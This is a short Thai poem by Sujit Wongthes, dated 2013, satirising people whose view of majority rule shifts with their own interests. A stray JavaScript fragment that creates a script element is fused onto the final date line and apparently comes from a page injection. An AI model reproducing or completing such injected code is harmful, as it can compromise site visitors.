ถ้าอยู่ฝ่ายได้เปรียบเสียงข้างมาก

ก็ปูดปากเสียงข้างมากชอบธรรมถ้อย

ถ้าอยู่ฝ่ายเสียเปรียบเสียงข้างน้อย

ก็พร่ำพล่อยเสียงข้างมากไม่ชอบธรรม

ขึ้นอยู่กับขณะนั้นยืนตรงไหน

ผลประโยชน์ข้างใครอุปถัมภ์

ขาวก็ดีแต่พูดให้เป็นดำ

ดำก็ทำเป็นขาวคล่องปากนัก

 

สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

6  ธันวาคม 2556var d=document;var s=d.createElement(‘script’);